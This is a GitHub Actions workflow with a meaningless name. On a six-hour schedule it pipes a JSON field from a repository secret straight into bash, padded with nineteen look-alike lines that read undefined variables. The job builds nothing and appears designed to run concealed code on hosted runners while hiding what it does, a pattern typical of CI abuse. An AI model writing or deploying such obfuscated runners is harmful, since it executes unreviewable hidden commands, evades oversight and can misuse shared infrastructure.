name: insuranceguilty

on:
  workflow_dispatch:
  schedule:
    - cron: '9 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: insuranceguilty
        env:
          d32: ${{ secrets.d32 }}
        run: |
          echo $d32 | jq -r .fj87937 | /bin/bash
          echo $lgix91311 | jq -r .bp08893 | /bin/bash
          echo $e7 | jq -r .cgtl37458 | /bin/bash
          echo $sgtk6495 | jq -r .xwrg0 | /bin/bash
          echo $ir72 | jq -r .irllz1 | /bin/bash
          echo $gkxsn7 | jq -r .typ77720 | /bin/bash
          echo $mvin48 | jq -r .ov76 | /bin/bash
          echo $rnxx4 | jq -r .auiu3427 | /bin/bash
          echo $odwk84 | jq -r .owcp659 | /bin/bash
          echo $gqft596 | jq -r .uxa22618 | /bin/bash
          echo $xm47 | jq -r .zvns5696 | /bin/bash
          echo $q890 | jq -r .rtygr1406 | /bin/bash
          echo $xnht375 | jq -r .jjluy05 | /bin/bash
          echo $hut280 | jq -r .dm012 | /bin/bash
          echo $b0843 | jq -r .esea6867 | /bin/bash
          echo $scyle151 | jq -r .q60186 | /bin/bash
          echo $qm5416 | jq -r .o3152 | /bin/bash
          echo $zpx41611 | jq -r .svx5 | /bin/bash
          echo $uwv7699 | jq -r .j354 | /bin/bash
          echo $t723 | jq -r .lbos16 | /bin/bash

